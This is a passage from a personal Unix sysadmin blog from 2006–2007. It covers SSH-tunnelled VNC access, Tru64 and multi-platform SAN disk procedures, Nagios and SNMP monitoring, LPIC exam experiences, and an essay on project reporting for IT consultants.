Setting up your router

You will need to make your SSH server accessible from the Internet. Configure your router in such a way that it forwards incoming traffic on port 22, to port 22 on your Mac.

Setting up your SSH client at work

If you forced your SSH server to use public/private keypairs earlier, then you'll need to configure your SSH client to do the same. You can use ssh-keygen (OS X and Linux) or PuTTYGen (Windows) to generate a key pair. Please Google around for instructions on how to use SSH keys.

You will need to tell your SSH client to connect to your SSH server at home and to set up port forwarding for VNC. In both examples $HOME-IP is the IP address of your Internet connection at home.

* On Linux and OS X (from the command line): ssh -L 5900:127.0.0.1:5900 $HOME-IP.

* On Windows (in PuTTY): SSH -> Tunnel -> local port = 5900, remote port = 127:0.0.1:5900

What you're doing here is rerouting any traffic that's coming in at your work PC at port 5900 to port 5900 at your home box.

Setting up your VNC client at work

All of the real work is being done by the SSH session, so you can instruct your VNC client to simply connect to desktop 0 at localhost, or at 127.0.0.1. Enter the password that you set up earlier.

Adding more security

Unfortunately Hot Corners don't work through VNC and FUS kills your VNC session, so we'll need to find another way to lock your OS X desktop. Luckily I've found a way in this article. You can use Keychain Access to add a small button to your menu that will allow you to lock your screen.

And there you have it! A fully working VNC setup that will allow you to use your Mac at home, from work.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Recovering a broken mirror in Tru64

2007-03-01 14:26:00

Today I faced the task of replacing a failing hard drive in one of our Tru64 boxen. The disk was part of a disk group being used to serve plain data (as opposed to being part of the boot mirror / rootdg), so the replacement should be rather simple.

After some poking about I came to the following procedure. Those in the know will recognize that it's very similar to how Veritas Volume Manager (VXVM) handles things. This is because Tru64 LSM is based on VXVM v2.

* voldiskadm -> option 4 -> list -> select the failing disk, this'll be used as $vmdisk below.

* voldisk list -> select the failing disk, this'll be used as $disk below.

* voldisk rm $disk

* Now replace the hard drive.

* hwmgr -show scsi -> take a note of your current set of disks.

* hwmgr -scan scsi

* hwmgr -show scsi -> the replaced disk should show up as a new disk at the bottom of the list. This'll be used as $newdisk below.

* dsfmgr -e $newdisk $disk

* disklabel -rw $disk

* voldisk list -> $disk should be labeled as "unknown" again.

* voldiskadm -> option 5 -> $vmdisk -> $disk -> y -> y -> your VM disk should now be replaced.

* volrecover -g $diskgroup -sb

The remirroring process will now start for all broken mirrors. Unfortunately there is no way of tracking the actual process. You can check whether the mirroring's still running with "volprint -ht -g $diskgroup | grep RECOV", but that's about it.


kilala.nl tags: , , , ,

View or add comments (curr. 2)

I've never liked HP-UX that much ...

2007-02-21 12:47:00

I've never been overly fond of HP-UX, mostly sticking to Solaris and Mac OS X, with a few outings here and there. Given the nature of one of my current projects however, I am forced to delve into HP's own flavour of Unix.

You see, I'm building a script that will retrieve all manner of information regarding firmware levels, driver versions and such so we can start a networkwide upgrade of our SAN infrastructure. With most OSes I'm having a fairly easy time, but HP-UX takes the cake when it comes to being backwards :[

You see, if I want to find out the firmware level for a server running HP-UX I have two choices:

1. Reboot the system and check the firmware revision from the boot prompt.

2. Use the so-called Support Tools Manager utility, called [x,m,c]stm.

CSTM is the command line interface to STM and thank god that it's scriptable. In reality the binary is a CLI menu driven system, but it takes an input file for your commands.

For those who would like to retrieve their firmware version automatically, here's how:

...

Uhm... FSCK! *growl* *snarl* What the heck is this?! For some screwed up reason my shell keeps on adding a NewLine char after the output of each command. That way a variable which gets its value from a string of commands will always be "$VALUE ". WTF?! o_O

I'm going to have to bang on this one a little more. More info later.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

The necessity of good reporting

2007-01-26 13:57:00

Finally, I've finised my fourth article for ;Login magazine. It'll appear in next month's issue, in the sysadmin section.

As is the tradition with my articles, I'll try to entice my fellow folks in IT to improve their "soft skills". In the past I've covered things like personal planning and various communications skills. This time I'll try to convey why good reporting is so important to your work and your projects.

HTML version.

PDF version.


kilala.nl tags: , , ,

View or add comments (curr. 0)

All quiet on the western front. Thomas discusses the necessity of good reporting.

2007-01-26 13:08:00

A PDF version of this document is available. Get it over here.

When I returned to the consulting business back in 2005 I found that a change to my modus operandi would have favorable results to the perceived quality of my work.

Up to that point I had never made a big point of reporting my activities to management, trusting that I'd get the job done and that doing so would make everyone happy. And sure enough, things kept rolling and I indeed got things done. But I won't claim that anyone really knew what I was up to or that they had more than a passing notion of my progress.

2005 provided me with a fresh start and I decided that I'd do things differently this time around. And indeed, as my reports started coming in, my client's response to both my employer and myself seemed to improve.

What's the use of reporting?

"So, Peter, what's happening? Aahh, now, are you going to go ahead and have those TPS reports for us this afternoon?"

From the movie 'Office Space'

Reporting. Reports. Status updates. Words that most people in IT dread and that instill nightmare images of piles of paperwork and endless drudgery with managers. Words that make you shudder at the thought of bosses nagging you about layout, instead of content. Of hours of lost time that could have been better spent doing real work.

But seriously, spreading the word about your work and your projects doesn't have to be a huge undertaking and it will probably even help you in getting things done. By spending just a few hours every month you could save yourself a lot of trouble in the long run.

Benefits for the customer:

Benefits for your employer and yourself:

Your first report: describe your assignment

"A lean agreement is better than a fat lawsuit"

German proverb

It may seem slightly odd, but your first report will be made before you've even done any real work. When you start a new project everyone will have a general idea of what you will be doing, but usually no-one has all the details. In order to prevent delays in the future, you will need to make very specific agreements early on.

To get things started you will need to have a little eye-to-eye with your client to draft your assignment. You will be hashing out every significant detail of what the client expects from you.

The good news is that such a meeting usually doesn't take up more than an hour, maybe two. After that you'll need another hour or so to put it all to paper, provided that you have already created a template of sorts.

By putting as much detail as possible into all of these criteria you are creating many opportunities for yourself. From now on everyone agrees on what you will be doing and outsiders can be quickly brought up to speed on your project. At later points in time you can always go back to your document to check whether you're still on the right track. And at the end of everything you can use your original agreement to grade how successful you were in achieving your goals.

So, what if you will be doing "normal" daily management of the customer's servers and IT infrastructure? Doesn't seem like there's a lot to describe, is there? Well, that's when you put extra focus on how things are done. Mind you, even normal daily management includes some projects that you can work on.

Either way, make sure that all demands have been made "SMART": specific, measurable, ambitious, realistic and time-bound. This means that everything should:

When your document is complete, go over it with your client once more to make sure he agrees on everything you put to paper. Then, get his approval in writing.

Here are two examples from my recent assignments. The first example was part of a real project with specific deliverables, while the second example covers normal systems management.

Requirement 1: improving on the old

Our current Nagios monitoring environment is severely lacking in multiple aspects. These include, but are not limited to:

* Sub-optimal design of the infrastructure involved.

* Many services, components and metrics are effectively not monitored.

* Sub-optimal configuration when it comes to alarming.

* Current configuration is a dirty conglomerate of files and objects.

* There is no proper separation between users. People can see monitors to which they really should have no access.



All of these issues should be fixed in the newly designed Nagios environment.

Thomas will take part in the department's normal schedule. This includes the following duties:

* Stand-by duty (being on call), once every five to six weeks.

* The daily shifts, meaning that he either starts his day at 08:00, OR doesn't leave the office before 18:00.

* The expanded schedule with regards to P1 priority incidents and changes. Thomas is expected to put in overtime in these cases.

* The department's change calendar. This involves regular night shifts to implement changes inside specific service windows.

Expanding your activities

You have done your utmost best to make your project description as comprehensive as possible. You've covered every detail that you could think of and even the customer was completely happy at the time.

Unfortunately happiness never lasts long and your client's bound to think of some other things they want you to do. Maybe there's a hike in your deadline, or maybe they want you to install a hundred servers instead of the original fifty. Who knows? Anything can happen! The only thing that's for certain is that it will happen.

When it does, be sure to document all the changes that are being made to your project. Remember, if your original project description is all you have to show at the end, then you'll be measured by the wrong standards! So be sure to go into all the specifics of the modifications and include them in an updated project description.

And of course, again make sure to get written approval from the client.

Interim reporting

Most people I've worked for were delighted to get detailed status updates in writing. Naturally your client will pick up bits and pieces through the grapevine, but he won't know anything for sure until you provide him with all the details. I've found that it is best to deliver a comprehensive document every six to eight weeks, depending on the duration of your undertaking.

Each report should include the following topics. Examples follow after the list.

A short description of your project

The goal of this project is to improve the monitoring capabilities at $CLIENT by completely redesigning the infrastructure, the software and the configuration of the Nagios environment.

Original tasks and their status

Automated installation of UNIX servers Weeks 26 and 27 (28th of June through the 8th of July) were spent full-time on the implementation of the Jumpstart server. $CLIENT had requested I give this part of the project the highest priority, due to recent discoveries regarding the recoverability of certain servers.



At this point in time the so-called Jumpstart server has the following functionality in place:



[...]



Therefore we can conclude that the Jumpstart server has reached full functionality.

Changes to your project

One of the changes made to the project, based on the new technical requirements, is the switch from NRPE to SNMP as a communications protocol. This choice will allow us greater flexibility in the future and will most likely also save us some effort in managing the Nagios clients.



The downside of this choice is my lack of experience in SNMP. This means that I will need to learn everything about SNMP, before I can start designing and building a project that's based upon it.

A simplified timesheet

An simplified time sheet.

Problems and challenges

On the 17th of July I issued a warning to local management that the project would we delayed due to two factors:

* My unfamiliarity with the SNMP protocol and software.

* The lack of a centralized software (and configuration) distribution tool. This lack means that we shall need to install each client manually.

Suggestions and recommendations

$CLIENT is quite lucky to have a CMDB (Configuration Management Database) that is rather up to date. This database contains detailed information on all of their systems and has proved to be very useful in daily life. However, what is lacking is a bird's eye view of the environment. Meaning: maps and lists and such which describe the environment in less detail, but which show a form of method to the madness.

Predictions regarding the outcome of your project

However, as can be seen from the included project planning, I will most probably not be finished with the project before the contract between Snow and $CLIENT runs out.



The contract's end date is set to the 16th of September, while my current estimates point to a project conclusion around the 1st of October. And that's assuming that there will be no delays in acquiring the backup and monitoring software.

Personal contact

One of the biggest mistakes I've made in my recent past was to assume that my customer was reading every document I'd been giving them. I'd been sending them e-mails about show stoppers and I'd been providing them with those beautiful reports I've been telling you about. But still something went horribly wrong. You see, some managers really don't care about technical background and thus they'll ignore certain parts of your reports. They figure that, since you're not coming to talk to them, everything's hunky-dory.

This is exactly why e-mail and big documents are no substitute for good, old face to face contact.

Make sure that you have regular conversations with your client about your progress and any problems that you've run into. You could even go the extra mile and request a regular, bi-weekly meeting! Talking to the customer in person will give you the change to make sure they know exactly what's going on and that they fully understand everything you've written in your interim report.

Everything comes to an end

"You can spend the rest of your life with me...but I can't spend the rest of mine with you. I have to live on. Alone. That's the curse of the Time Lords."

From 2005's season of 'Doctor Who'

Like all masterpieces your enterprise needs a grand finale!

Now that all the work has been done and your goals have been reached you will need to transfer responsibility for everything that you've made. Cross the Ts and dot the Is and all that. In short, you'll be writing an expanded version of the interim report.

The composition of your document should include the following topics:

On the last page of your document, leave room for notes and signatures from your client and their lead technicians. Go over the document with everyone that'll need to take responsibility for your project. When they agree with everything you've written, have them sign that page. You will end up with a page that contains all the autographs that you'll need.

Task review

Solaris automated installation server



[...]



Current status:

Finished per December of 2005. Unfortunately there are a few small flaws still left in the standard build. These have been documented and will be fixed by $CLIENT.

Project recommendations

A basic list of applications to be entered into phase 2 was delivered a few weeks ago. Now we will need to ascertain all the items that should be monitored on a per-application basis.



Once those requirements have been decided on we can continue with the implementation. This includes expanding the existing Nagios configuration, expanding the Nagios client packages and possibly the writing of additional plugins.

Resource expenditure

A graph detailing how I spent my time

Risks and pitfalls

These are areas identified by Thomas as risk areas that need addressing by the $CLIENT team:



1. Limited knowledge of Nagios's implementation of SNMP. 2. Limited knowledge of Perl and Shell scripting in lab team. 3. Limited knowledge of SDS/SVM volume management in lab team. 4. Limited knowledge of Solaris systems management. 5. Only 1 engineer in lab team able to support all aspects of Unix.

Checklists

An example of a checklist.

In conclusion

I've found that many of my customers were pleasantly surprised to receive detailed project reports. It really is something they're not used to from their IT crowd. So go on and surprise your management! Keep them informed, strengthen your bond with them and at the end of the day take in the compliments at a job well done.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Why ZFS matters to the rest of us

2006-12-22 22:41:00

Thanks to a link on the MacFreak fora I stumbled onto a great blog post explaining why ZFS is actually a big deal. The article approaches ZFS from the normal user's angle and actually did a good job explaining to me why I should care about ZFS.

Real nice stuff and I'm greatly looking forward to Mac OS X.5 which includes ZFS.


kilala.nl tags: , , , ,

View or add comments (curr. 1)

As promised: adding a new LUN to Tru64

2006-12-22 09:00:00

As I promised a few days ago I'd also give you guys the quick description of how to add a new LUN to a Tru64 box. Instead of what I told you earlier, I thought I'd put it in a separate blog post instead. No need to edit the original one, since it's right below this one.

Adding a new LUN to a Tru64 box with TruCluster

1. Assign new LUn in the SAN fabric.

No something I usually do.

2. Let the system search for new hardware.

hwmgr scan scsi

3. Label the "disk".

disklabel -rw $DISK

4. Add the disk to a file domain (volume group).

mkfdmn $DISK $DOMAIN

5. Create a file set (logical volume).

mkfset $DOMAIN $FILESET

6. Create a file system.

Not required on Tru64. Done by the mkfset command.

7. Test mount.

Mount.

8. Add to fstab.

vi /etc/fstab

Also, if you want to make the new file system fail over with your clustered application, add the appropriate cfsmgr command to the stop/start script in /var/cluster/caa/bin.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Crash course in new OSes

2006-12-20 20:20:00

The past two weeks I've been learning new stuff at a very rapid pace, because my client uses only a few Solaris boxen and has no Linux whatsoever. So now I need to give myself a crash course in both AIX and Tru64 to do stuff that I used to do in a snap.

For example, there's adding a new SAN device to a box, so it can use it for a new file system. Luckily most of the steps that you need to take are the same on each platform. It's just that you need to use different commands and terms and that you can skip certain steps. The lists below show the instructions for creating a simple volume (no mirroring, striping, RAID tricks, whatever) on all three platforms.

Adding a new LUN to a Solaris box with SDS

1. Assign new LUN in the SAN fabric.

Not something I usually do.

2. Let the system search for new hardware.

devfsadm -C disks

3. Label the "disk".

format -> confirm label request

When using Solaris Volume Manager

4. Add the disk to the volume manager.

metainit -f $META 1 1 $DISK

5. Create a logical volume.

metainit $META -p $SOFTPART $SIZE

6. Create a filesystem

newfs /dev/md/rdsk/$META

7. Test mount.

mount $MOUNT

8 Add to fstab.

vi /etc/vfstab

When using Veritas Volume Manager

4. Let Veritas find the new disk.

vxdctl enable

5. Initialize the disk for VXVM usage and add it to a disk group.

vxdiskadm -> initialize

6. Create a new volume in the diskgroup.

Use the vxassist command.

7. Create a file system.

newfs /dev/vx/rdsk/$VOLUME

8. Test mount

mount $MOUNT

9. Add to vfstab

vi /etc/vfstab

Adding a new LUN to an AIX box with LVM

1. Assign new LUN in the SAN fabric.

Not something I usually do.

2. Let the system search for new hardware.

cfgmgr

3. Label the "disk".

Not required on AIX.

4. Add the disk to a volume group.

mkvg -y $VOLGRP -s 64 -S $DISK

5. Create a logical volume.

mklv -y $VOLNAME -t jfs2 -c1 $VOLGRP $SIZE

6. Create a filesystem

crfs -v jfs2 -d '$VOLNAME' -m '$MOUNT' -p 'rw' -a agblksize='4096' -a logname='INLINE'

7. Test mount

mount $MOUNT

8 Add to fstab.

vi /etc/filesystems

Adding a new LUN to a Tru64 box running TruCluster

I'll edit this post to add these instructions tomorrow, or on Friday. I still need to try them out on a live box ;)

Anywho. It's all pretty damn interesting and it's a blast having to almost instantly know stuff that's completely new to me. An absolute challenge! It's also given me a bunch of eye openers!

For example I've always thought it natural that, in order to make a file system switch between nodes in your cluster, you'd have to jump through a bunch of hoops to make it happen. Well, not so with TruCluster! Here, you add the LUN, go through the hoops described above and that's it! The OS automagically takes care of the rest. That took my brain a few minutes to process ^_^


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Got my LPIC-101

2006-12-14 11:37:00

This morning I went to my local Prometric testing center for my LPI 101 exam (part one of two, for the LPIC-1). On forehand I knew I wasn't perfectly prepared, since I'd skipped trial exams and hadn't studied that hard, so I was a little anxious. Only a little though, since I usually test quite well.

Anywho: out of a maximum of 890 points I got 660, with 500 points being the minimum passing grade. Read item 2.15 this page to learn more about the weird scoring method used by the LPI. It boils down to this: out of 70 questions I got 61 correct, with a minimum of 42 to pass. If we'd use the scoring method Sun uses, I'd have gotten an 87%. Not too bad, I'd say!

I did run into two things that I was completely unprepared for. I'd like to mention them here, so you won't run into the same problem.

1. All the time, while preparing, I was told that I'd have to choose a specialization for my exam: either RPM or DPKG. Since I know more about RPM I had decided to solely focus on that subject. But lo and behold! Apparently LPI has _very_ recently changed their requisites for the LPIC-1 exams and now they cover _both_ package managers! D:

2. In total I've answered 98 questions, instead of the 70 that was advertised. LPI mentions on their website (item 2.13) that these are test-questions, considered for inclusion in future exams. These questions are not marked as such and they do not count towards your scoring. It would've been nice if there had been some kind of screen or message warning me about this _at_the_test_site_.

Anywho... I made and now I'm on to the next step: LPIC-102.


kilala.nl tags: , , , , ,

View or add comments (curr. 0)

LPIC-101 Summary

2006-12-12 22:38:00

Version 1.0 of my LPIC-101 study notes is available. I bashed it together using the two books mentioned below. A word of caution though: this summary was made with my previous knowledge of Solaris and Linux in mind. This means that I'm skipping over a shitload of stuff that might still be interesting to others. Please only use my summary as something extra when studying for your own exam.

I'm up for my exam next Thursday, at ten in the morning. =_=;

Oh yeah... The books:

Ross Brunson - "Exam cram 2: LPIC 1", 0-7897-3127-4

Roderick W. Smith - "LPIC 1 study guide", 978-0-7821-4425-3


kilala.nl tags: , , , , , ,

View or add comments (curr. 0)

NLOSUG meeting

2006-10-25 23:38:00

Phew! That was a long night! I'm not used to staying up this late on weekdays =_=

I went to the first NLOSUG meeting tonight, like I said I would a few days ago. Aside from finally learning a little bit about Open Solaris (although most of it was basic community stuff) and some more in-depth stuff on ZFS, it was also very cool to meet some old acquaintances. There was a bunch of folks from Sun whom I hadn't seen in a long time, as well as Martijn and Job with whom I'd worked as colleagues a long time ago. Shiny :)

So the eve' was mostly for fun, with a little education thrown in. Well worth the hours I put in...


kilala.nl tags: , ,

View or add comments (curr. 3)

Using BSD hardware sensors with SNMP.

2006-10-25 09:05:00

Many thanks to my colleague Guldan who pointed me towards a website giving a short description of using the BSD hardware-sensors daemon, together with Nagios in order to monitor your hardware. Using sensord should make things a lot easier for people running BSD, as they won't have to muck about with SNMP OIDs and so on.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Open Solaris Users Group

2006-10-20 13:13:00

Sun has made arrangements for the inaugural meeting of the Dutch Open Solaris Users Group. The meeting will be held on the evening of Thursday the 26th, at their office in Amersfoort.

Aside from the stuff you'd expect (like a few lectures on new Solaris features) you could also say it'll be a fun evening :) Meet some new people, have some food'n'drinks all mixed in with some interesting work-related stuff.

I'm game :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Two days of training

2006-10-17 19:38:00

Monday and Tuesday were not spent with the usual Nagios project in Amersfoort. Instead, I spent two days cooped up in a small hotel, somewhere in the Achterhoek (for my foreign visitors: one of the Netherlands' rural, backwater areas). It was time well spent, on a inter-personal communications course from CCCM.

While originally quite sceptic, the course turned out fine. About halfway Monday things took a course that made me decide that their approach might not fit my preferences, but half an hour later I also decided that _sticking_ with the course would help me in achieving one of my goals: learning to play my cards close to my chest and not letting a group of people on to my emotions regarding a subject. So even though the course may not be 100% up my alley, I may as well take the time to get some practice in :)

Anywho... November and January will see two additional training days, with a few personal talks at the CCCM office thrown in as well.


kilala.nl tags: , , ,

View or add comments (curr. 2)

Great minds think alike

2006-10-03 23:31:00

This goes to show that the proverb above is right: Joerg Linge, whom I met at NagKon 2006, just e-mailed me. He mentioned that right around the same time we had both come up with a similar solution to one problem.

The problem: use Nagios plugins through a normal SNMP daemon.

Our solutions were identical when it came to configuring the daemon, but differed slightly when it comes to getting the information from the client. The approach is the same, but while he uses Perl for the plugin, I use Bash ^_^

Life's little coincidences :)

Joerg's solution and write-up.

My solution and write-up.

Anywho... Joerg's a cool guy :) Go check out his website and have a look around.


kilala.nl tags: , , ,

View or add comments (curr. 2)

Nagios Conference, aftermath

2006-09-24 09:04:00

So I made it back home in one piece. My trip back took me around 7.5 hours, which was mostly due to me driving a little bit faster :p

I have to say that the A45 route up north is much less glamorous than the A3 :( The Rast Hofe all look much older and less fancy than the ones on the A3. Ah, but they sufficed anyway...

I'm thinking of moving my summaries from the previous blog posts into one big page in the Sysadmin section. Reckon that should prevent Google from raising the Archives above the Sysadmin section when it comes to Nagios.

/me starts immediately.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Nagios Conference, day 2

2006-09-22 23:27:00

< moved to Sysadmin section, to keep Google from messing up >


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios Conference, intermission

2006-09-21 17:10:00

Astounding by the way, the amount of Apple laptops I see around here. Less than at SANE'06, but still, around 35%. o/


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios Conference, day 1

2006-09-21 17:01:00

< moved to Sysadmin section, to keep Google from messing up >


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios Conference, intermission

2006-09-21 14:19:00

For the conference I had Snow buy me the iMic and a nice Philips microphone. For now though, I'm not completely happy with the setup.

* The mic is omnidirectional and thus doesn't pick up much of what person out in front is telling, while it does pick up quite a loot of noise from the room.

* iMic is a USB device and it seems that it claims enough CPU resources to mess with the rest of my system :(

Lunch was nice though! <3


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios Conference, day 0

2006-09-20 23:21:00

< moved to Sysadmin section, to keep Google from messing up >


kilala.nl tags: , ,

View or add comments (curr. 2)

Off to Germania I go!

2006-09-19 21:13:00

The next few days I'll be in Germania... Nurnberg, to be precise.

Together with around eighty other Nagios administrators and experts I'll be attending the first, annual Nagios Conference. Over the course of two days, we'll get a chance to meet up together, exchange ideas and generally have a go at improving both Nagios and our knowledge of the software. I'm looking forward to it quite a lot.

Maybe I'll even meet up with a few of the mailing list members :) I'll bring the camera and I'll try to snap a few quick pics.


kilala.nl tags: , , ,

View or add comments (curr. 2)

Learn something new every day

2006-09-14 21:18:00

Creating my own, custom icon set for Mac OS X will be quite large a job I've learned so far :)

Basically what it boils down to, is that you:

* Create a nice icon using something like Gimp of Paintshop.

* Create an icon template using IconoGrapher.

* Size your icon down to 128x128, 48x48, 32x32 and 16x16. These four images will be used in Iconographer.

* Each "size" also requires that the mask you need is of the appropriate size.

* All of this rolled together makes a "new style" OS X icon, that can be used all through the OS.

Shit loads of work, but very interesting!

Here's the first six I've created so far. What you cannot see in this image (due to the lack of Alpha stuff), is that each icon has nice rounded corners.

From left to right: Chicken of the VNC, Adium, Adium offline, Adium away, Adium idle, Adium alert. The five Adium icons are bundled into an icon package that can be installed in Adium. The first Adium icon is used in the IconoGrapher template.


kilala.nl tags: , ,

View or add comments (curr. 4)

Dependency hell

2006-08-23 14:37:00

Damn! I'm really starting to hate Dependency Hell. Installing a few Nagios check scripts requires the Perl Net::SNMP module. This in turn requires three other modules. Each of these three modules requires three other modules, three of which require a C compiler on your system (which we naturally don't install on production systems). And neither can we use the port/emerge/apt-get alike Perl tools from CPAN, since (yet again) these are production systems. Augh!


kilala.nl tags: , , , , ,

View or add comments (curr. 0)

Building RPM packages

2006-08-10 13:48:00

While working on the $CLIENT-internal package for the Nagios client (net-SNMP + NRPE + Nagios scripts + Dell/HP SNMP agent), I've been learning about compound RPM packages. I.e., packages where you combine multiple source .TGZs into one big RPM package. This requires a little magic when it comes to running the various configure and make scripts. Luckily I've found two great examples.

* SPEC file for TCL, a short SPEC file that builds a package from two source .TGZs.

* SPEC file for MythTV, a -huge- SPEC file that builds multiple packages from multiple source .TGZs, along with a very dynamic set of configure rules.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

SANE 2006 conference notes

2006-08-09 07:35:00

After months and months I've uploaded the notes that I took at the various lectures at SANE 2006. They might be usefull to -someone- out there. Who knows. Be aware though that portions of the notes are a mishmash of dutch and english :) The notes can be found as .PDFs in the menu on the left.


kilala.nl tags: , , , , ,

View or add comments (curr. 0)

Listen up. Here's da plan...

2006-08-08 16:52:00

Because I've got all kinds of things lined up for me to do, I'm going to put them into order. That way both you and I will know what to expect. Here's my priorities:

1. Make the requisite changes to my website, so that it plays nicely with search engines. This shouldn't be more than an evening or two of work (barring any reruns of Doctor Who on BBC3).

2. Study for my two LPIC1 exams.

3. Revive the manga and anime section of the website. This needs regular updates, so I'm going to have to think of a few nice things to add to this. I'm thinking "reviews"... It's also meant to give me a couple of days off between studying for my four exams.

4. Study for my two LPIC2 exams.

5. Move other parts of the website into the mySQL database as well.

6. Improve the PHP code that gets data from the database. It could be much cleaner, safer and efficient.

7. Build some form of CMS for myself, so I don't have to work in the database manually.

So there you have it boys! The next few months of my life lined out for ya.

Parallel to da plan I will keep on expanding the Sysadmin section with new stuff I discover every week. And I will try to fit in a week or two of vacation somewhere along the line. I have a big bunch of video games that I finally want to finish!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Creating packages

2006-08-08 11:04:00

Recently I've been trying to learn how to build my own packages, both on Solaris and on Linux. I mean, using real packages to install your custom software is a much better approach than simply working with .TGZ files. In the process I've found two great tutorials/books:

* Maximum RPM, originally written as a book by one of Red Hat's employees.

* Creating Solaris packages, a short HOWTO by Mark.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

SNMP = hard work

2006-08-01 17:23:00

Boy lemme tell ya: making a nice SNMP configuration so you can actually monitor something useful takes a lot of work! :) The menu on the left has been gradually expanding with more and more details regarding the monitoring of Solaris (and Sun hardware) through SNMP. Check'em out!


kilala.nl tags: , , , ,

View or add comments (curr. 0)

All work and no play...

2006-08-01 11:49:00

Busybusybusy, that's what I've been. I've been adding all kinds of new stuff to the Sysadmin section, telling you everything you'd like to know about monitoring Solaris and Sun hardware through SNMP.

I don't have much interesting to tell to the non-admin people right now :) Better luck at a later point in time.


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios clients for UNIX/Linux

2006-07-27 13:01:00

I've added a small comparison between the various ways in which your Nagios server can communicate with its clients. It's in the menu on the left, or you can go there directly.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Using SNMP with Solaris and Sun hardware

2006-07-26 16:25:00

After digging through Sun's MIB description (see SUN-PLATFORM-MIB.txt) it became clear to me that things are a lot more convoluted than I originally expected. For example, each sensor in the Sun Fire systems lead to at least five objects each describing another aspect of the sensor (name, value, expected value, unit, and so on). Unfortunately Sun has no (public) description of all possible SNMP sensor objects so I've come to the following two conclusions:

1. I'll figure it all out myself. For each model that we're using I'll weasel out every possible sensor and all information relevant to these sensors.

2. I'll have to write my own check script for Nagios which deals with with all the various permutations of sensor arrays in an appropriate fashion. Joy...

EDIT:

For your reference, Sun has released the following documents that pertain to their SNMP implementation. Mostly they're a slight expansion on the info from the MIB. At least they're much easier on the eyes when reading :p

* 817-2559-13

* 817-6832-10

* 817-6238-10

* 817-3000-10


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Using your Mac OS X system with Vodafone GPRS

2006-07-25 10:42:00

Sweet! I've finally gotten my Nokia cell phone to work as a Bluetooth modem for my GPRS connection.

Vodafone had already sent me a manual describing how to set up the connection, but unfortunately it wasn't working for me. Turns out that Vodafone skipped a few steps. The life saver in this matter turns out to be Ross Barkman's website which has GPRS modem scripts for leading brand cell phones.

If you would like to get your OS X system connected to the Internet through GPRS, do the following:

* Download the appropriate scripts for your phone from Ross' website and install them in "/Library/Modem scripts".

* Add your phone as a BT device (refer to your GSM provider's manual for details).

* Tell OS X to use the phone for a high speed Internet connection (refer to your GSM provider's manual for details).

Up to now I've been working according to Vodafone's manual. These are the changes I had to make (all of them in System Preferences -> Network -> Bluetooth modem)...

PPP tab:

* Instead of "*99#", use "office.vodafone.nl" as your telephone number (depending on your subscription it could also be "web." or "live.".

* Username and password are still "vodafone" and "vodafone".

* Turn off "Send PPP echo packets" and "Use TCP header compression" under PPP Options.

Bluetooth modem tab:

* Instead of "Nokia infra-red", use "Nokia GPRS CID1" as the modem script.

* Turn off "Wait for dialtone".

Now your connection should work. Try dialing in using Internet Connect or the Dial Now button in Network preferences.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Sun-platform-mib.txt

2006-07-25 09:34:00

Right now I'm working on getting my Sun systems properly monitored through SNMP. Using the LM_sensors module for Net-SNMP has gotten me quite far, but there's one drawback. A lot of Sun's internal counters use some really odd values that don't speak for themselves. This makes it necessary to read through Sun's own MIB and correlate the data in there with the stuff from LM_sensors.

Point is, Sun isn't very forthcoming with their MIB even though it should probably be public knowlegde. Nowhere on the web can I find a copy of the file. The only way to get it is by extracting it from Sun's free SUNWmasfr package, which I have done: here's SUN-PLATFORM-MIB.txt

In now way am I claiming this file to be a product of mine and it definitely has Sun's copyright on it. I just thought I'd make the file a -little- bit more accessible through the Internet. If Sun objects, I'm sure they'll tell me :3


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Fixes to check_log2 and check_log3

2006-06-19 15:11:00

Both check_log2 and check_log3 have been thoroughly debugged today. Finally. Thanks to both Kyle Tucker and Ali Khan for pointing out the mistakes I'd made. I also finally learned the importance of proper testing tools, so I wrote test_log2 and test_log3 which run the respective check scripts through all the possible states they can encounter.

Oh... check_ram was also -finally- modified to take the WARN and CRIT percentages through the command line. Shame on me for not doing that earlier.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Check_log3 is born

2006-06-01 14:53:00

Today I made an improved version of the Nagios monitor "check_log2", which is now aptly called "check_log3". Version 3 of this script gives you the option to add a second query to the monitor. The previous two incarnations of the script only allowed you to search for one query and would return a Critical if it was found. Now you can also add a query which will return in a Warning message as well. Goody!


kilala.nl tags: , , , ,

View or add comments (curr. 0)

An introduction to Nagios monitoring

2006-06-01 00:00:00

Working at $CLIENT in 2005 was the first time that I built a complete monitoring infrastructure from the ground on up. In order to keep expenses low we went for a free, yet versatile monitoring tool: Nagios

Nagios, which is available over here, is a free and Open Source monitoring solution based on what was once known as NetSaint.

Nagios allows you to monitor a number of different platforms through the use of plugins which can run on both the server as well as on the monitoring clients. So far I've heard of clients being available for various UNIXen and BSDs (including Mac OS X) and Windows. Windows monitoring requires either the unclear NSClient software, or the NRPE_nt daemon which is basically a port of the UNIX Nagios client.

Setting up the basic server requires some fidgeting with compilers, dependencies and so on. However, a reasonably experienced sysadmin should be able to have the basic software up and running (and configured) in a day. However, adding all the monitors for all the clients is a matter entirely

Although there are a number of GUI's available which should make configuring Nagios a bit easier, I chose to do it all by hand. Just because that's what I'm used to and because I have little faith in GUI-generated config files. You will need to define each monitor separately for each host, so let's take a look at a quick example.

Say that you have twenty servers that need to be monitored by ten monitors each. Each definition in the configuration file takes up approximately sixteen lines, so in the end your config file will be at least 3200 lines long :)

But please don't let that deter you! Nagios is a powerful tool and can help you keep an eye on _a_lot_ of different things in your environment. I for one have become quite smitten with it.

